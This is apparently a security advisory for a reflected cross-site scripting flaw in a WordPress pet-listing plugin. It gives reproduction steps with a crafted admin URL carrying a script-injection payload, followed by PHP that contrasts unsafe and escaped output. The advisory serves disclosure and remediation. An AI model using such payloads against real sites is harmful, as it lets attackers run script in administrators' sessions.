Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue which could be used against high-privilege users such as admins.

1. Add a pet and publish the listing.
2. View the pet on the frontend of the site and get a valid post ID (found on the `` element as a class, i.e. `postid-9`).
3. Make a logged-in admin open a link: https://example.com/wp-admin/post.php?post=__POST_ID__HERE__&action=edit&cmb_force_send=true&cmb_send_label=test%27%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
4. See the XSS
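
The `cmb_send_label` value in the link above decodes to `test');</script><script>alert(1)</script>`, which suggests the parameter is echoed into a single-quoted JavaScript string inside an inline script block. The PHP below is an added example, not the plugin's code: it assumes that sink, uses a hypothetical `setLabel()` call, and shows the unescaped output beside a hardened one.

```php
<?php
// Added example: hypothetical rendering helpers, not the plugin's code.
// Assumption: the request value lands inside a single-quoted JS string
// in an inline <script> block. setLabel() is a made-up function name.

// Vulnerable pattern: the raw value is concatenated into the script.
function render_unsafe(string $label): string {
    return "<script>setLabel('" . $label . "');</script>";
}

// Hardened pattern: emit the value as a JSON string literal with the
// HTML-significant characters hex-escaped, so it can neither close the
// JS string nor terminate the <script> element.
function render_safe(string $label): string {
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;
    $json  = json_encode($label, $flags);
    if ($json === false) {
        // Encoding failed (e.g. invalid UTF-8): fall back to an empty string.
        $json = '""';
    }
    return "<script>setLabel(" . $json . ");</script>";
}

// Value of cmb_send_label from the link above, URL-decoded.
$label = urldecode(
    'test%27%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
);

echo "unsafe: ", render_unsafe($label), PHP_EOL;
echo "safe:   ", render_safe($label), PHP_EOL;

// Count <script> opening tags in each rendering. More than one means the
// value closed the original block and started a new one.
printf("unsafe script tags: %d\n", substr_count(render_unsafe($label), '<script>'));
printf("safe script tags:   %d\n", substr_count(render_safe($label), '<script>'));
```

In a WordPress plugin, `wp_json_encode()` accepts the same flags, and `esc_js()` is the core helper for values placed inside a quoted JavaScript string.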